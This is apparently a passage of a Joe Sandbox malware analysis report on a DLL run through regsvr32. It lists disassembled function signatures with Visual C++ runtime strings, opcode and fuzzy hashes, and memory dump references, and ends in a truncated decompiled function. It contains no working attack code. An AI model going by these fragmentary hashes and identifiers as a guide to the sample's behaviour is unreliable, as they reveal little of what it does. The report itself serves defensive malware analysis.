                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: get_int64_arg
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 1967237116-1983305044
                                                                                                                                            • Opcode ID: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                                                                                            • Instruction ID: a5aaaf886575dd902b07b2d310a53c907261cb9ee8c79d554981decbda92b4c1
                                                                                                                                            • Opcode Fuzzy Hash: 2a7d659c8e5e6b28fc7c58fcf8e8579ea91b99a8d6af850dbdc893ea63a98b90
                                                                                                                                            • Instruction Fuzzy Hash: 77F1F67250CA9ACAE774DF15E9403ABB7A0EB84751F200536E68D86AD9EF7CE440CF14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                                                                                                                            • API String ID: 2123368286-3477667311
                                                                                                                                            • Opcode ID: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                                                                                            • Instruction ID: 713b17df19d9bcfef3d863cca12662510b39088e0d2c776ef600f0f4dea71662
                                                                                                                                            • Opcode Fuzzy Hash: b8fc4c6395d55294f14e808969fd0dde924ec27b835ffc5b45b9a86212572efe
                                                                                                                                            • Instruction Fuzzy Hash: 0FF18F32A0DB9AD5EB748F15E54436AA3A0FB85B94F204935D69D43BE8DF3CD084CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                                                                                                                            • API String ID: 2123368286-1420200500
                                                                                                                                            • Opcode ID: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                                                                                            • Instruction ID: 4c19d75e325b9efef00f9240194d7d7fbc9e53f88e6c3e7e42504af6b2875286
                                                                                                                                            • Opcode Fuzzy Hash: 0735035b45f8f7c7b818c7081b0ef0632545b94255aff591ce5d43235ef3c046
                                                                                                                                            • Instruction Fuzzy Hash: 4EF14C32A0CBAAD5EB748F14E54436E67A0EB85B94F204935D69D43BE8DF3CD084CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                                                                                                                            • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2560055391-3497434347
                                                                                                                                            • Opcode ID: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                                                                                            • Instruction ID: 23f14958af17f5473f382f47b143692a648341c3bc89145e728207dffed2ac9d
                                                                                                                                            • Opcode Fuzzy Hash: f7e31fddf96ab2d989b429fa4fac32de28ca989592260db18f40bb78f450a6ea
                                                                                                                                            • Instruction Fuzzy Hash: 77C1297290C6EAC6E775CF14E5443AAB7A4EB84B44F600435D68C86AE9DF7CE544CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __doserrno$_invalid_parameter
                                                                                                                                            • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                                                                                                                            • API String ID: 747159061-1442092225
                                                                                                                                            • Opcode ID: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                                                                                            • Instruction ID: 88d382ae336b333e9a04ceed06e30daf3906b52b261dc08be7e4c40c86486c7d
                                                                                                                                            • Opcode Fuzzy Hash: ef8329fd12da17d600f4f9f1cced5d5e2c2be82d60747835616dff46824e4e92
                                                                                                                                            • Instruction Fuzzy Hash: 2A61B07291C66AC6E7249F21E94036A7361FF84B64F604B31E66D476E9DF7CE401CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                                                                                                                            • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                                                                                                                            • API String ID: 1778837556-2487400587
                                                                                                                                            • Opcode ID: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                                                                                            • Instruction ID: d6182b3f7c6767bf7d53ee6fa9f4f50f19f30b822ec13389ecc86b8a19d998b6
                                                                                                                                            • Opcode Fuzzy Hash: 577a98effe66048d1b02d2ce2304ffee9433b0bc14e646f7048145a1ac209acc
                                                                                                                                            • Instruction Fuzzy Hash: CC51C47660CB99E1E734CB04E4803EAB3A5FB88B94F604535EA8D42BA9DF3DD154CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 83251219-3442986447
                                                                                                                                            • Opcode ID: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                                                                                            • Instruction ID: af707916a315deab20673a0836fc056554d7f36cfe0b6347e4668d4b84df663f
                                                                                                                                            • Opcode Fuzzy Hash: 001a85c562113ca4b869716a344f10cda0261345211a969ed6127680fca34cae
                                                                                                                                            • Instruction Fuzzy Hash: 36F1F57290CAD9C6E774CF15E5843AAB7A4EB84B44F200536E68D87AA9DF7CD540CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                                                                                                                            • API String ID: 2123368286-2816485415
                                                                                                                                            • Opcode ID: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                                                                                            • Instruction ID: 2dcd2eb3be336e1ae102954a7e56e6080970796e38196ff8eba5af066fb812c1
                                                                                                                                            • Opcode Fuzzy Hash: a9ecfc86665cfe11dfc030c63538da66c5eec56c542ce672bdc8af4c2c9759d0
                                                                                                                                            • Instruction Fuzzy Hash: 29618E72A1C66EC7E724EB10E64076A7361FB84B84F605A35E55E46AD9CF7CE400CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __doserrno$_invalid_parameter
                                                                                                                                            • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                                                                                                                            • API String ID: 747159061-2992490823
                                                                                                                                            • Opcode ID: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                                                                                            • Instruction ID: c637c41a79e63e75e66dfbe0d866ca63b8a0bf2490c484d879be81ff0daee24a
                                                                                                                                            • Opcode Fuzzy Hash: 145745de55703435efe457d343042b6d2b79a4b89ecca71574c94757b3ea27c1
                                                                                                                                            • Instruction Fuzzy Hash: F1517F32A1C66EC7E724AF20E64036A77A2FB84B94F605A31E15D876D5DF7DE410CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                                                                                                                            • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                                                                                                            • API String ID: 1930727954-3864165772
                                                                                                                                            • Opcode ID: 53ed6c7dc9c3017b6de27dce3b9aec11c1bcaebc47f482f4e33ed4626b187432
                                                                                                                                            • Instruction ID: 342fd2b36f248590f3d5b80a75b8ffa612adb5aaa9a1118f867750fa94733801
                                                                                                                                            • Opcode Fuzzy Hash: 53ed6c7dc9c3017b6de27dce3b9aec11c1bcaebc47f482f4e33ed4626b187432
                                                                                                                                            • Instruction Fuzzy Hash: F0F14C2260DBD9C5E7708F19E88076AB7A0FB89B64F204625CAAD477E4CF3DD445CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                                                                                                                            • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 1328470723-1899493600
                                                                                                                                            • Opcode ID: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                                                                                            • Instruction ID: 30154d0511f07b8f79b0c4c1850c4e07318a678153883cdfdbf9fccc533b98d8
                                                                                                                                            • Opcode Fuzzy Hash: f6969a0051e08e9fb172d17dbb699df528c09bf6843d3bd9f9f4304ac6550dc4
                                                                                                                                            • Instruction Fuzzy Hash: 97C1287290CA9AC6E7749F14E5403ABB7A0EB84B55F600436E68D87AD9DF7CE440CF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2352934578-0
                                                                                                                                            • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                                                                                            • Instruction ID: cc57cca80a1c5fd04d515b748164a6bb1ae0d89d98748fa51527c3c67faa80e4
                                                                                                                                            • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                                                                                                                            • Instruction Fuzzy Hash: 05B1F33290C799CAE7608F55E44476EB7A0FB88B54F204635EA8D43B98DB7ED448CF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                                                                                                                            • API String ID: 2123368286-322314505
                                                                                                                                            • Opcode ID: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                                                                                            • Instruction ID: ce624edd3e5582970a10863de9ecad8e319ec31dbaf232b7341fce682bc77514
                                                                                                                                            • Opcode Fuzzy Hash: 3bb9d1a90c7c3446087a29b367bd8117c888f0c96a3fbe465b5df790d7333f4b
                                                                                                                                            • Instruction Fuzzy Hash: 74024C32A0CB9AC5EBB48F25E54476A63A0FB85B94F204935D69D83BE5DF3CD084CB11
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 1139040907-3988320827
                                                                                                                                            • Opcode ID: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                                                                                            • Instruction ID: b2dcf6377e6167a104ffc3549949cafc15cb4b07028d114938722c7255c24e7c
                                                                                                                                            • Opcode Fuzzy Hash: 4175f3561072ab378176a1e1f92056bf5caba3e85f41217d234b1a14ff64e00d
                                                                                                                                            • Instruction Fuzzy Hash: BEF1E67290CA9ACAE764CF15E9403ABB7A0FB84B55F200536E68D87A99DF7CD440CF14
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                                                                                                                            • API String ID: 2123368286-3300880850
                                                                                                                                            • Opcode ID: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                                                                                            • Instruction ID: f34809d18f07686ec06da7e526c1ce031c6dcf99f8641867bcf11de645c9e270
                                                                                                                                            • Opcode Fuzzy Hash: 938211b99713ed548de0de10d16fbf2c247e5ceda09f99a66501889bb82a488d
                                                                                                                                            • Instruction Fuzzy Hash: 1EC11C32A0CB9AC5EB748F64E94436A63A0FB85B98F604935D69D43BD5DF7CD084CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                                                                                                                            • API String ID: 2123368286-3045918802
                                                                                                                                            • Opcode ID: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                                                                                            • Instruction ID: 75edac3cb6ac7051773a6d0c7f3da0858d59986665791f9897cd9a2440cf629f
                                                                                                                                            • Opcode Fuzzy Hash: ee01400f27967885302bbfc3418a092fc70a607ac75d61aa13826b291406155b
                                                                                                                                            • Instruction Fuzzy Hash: F1C12B3290CB9AD5EB708F24E44436AA7A0FB89B54F604936D69D43BD9DF3DD044CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 15%
                                                                                                                                            			E00007FFC7FFC65D0F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
                                                                                                                                            				intOrPtr _v24;
                                                                                                                                            				long long _v32;
                                                                                                                                            				intOrPtr _v36;
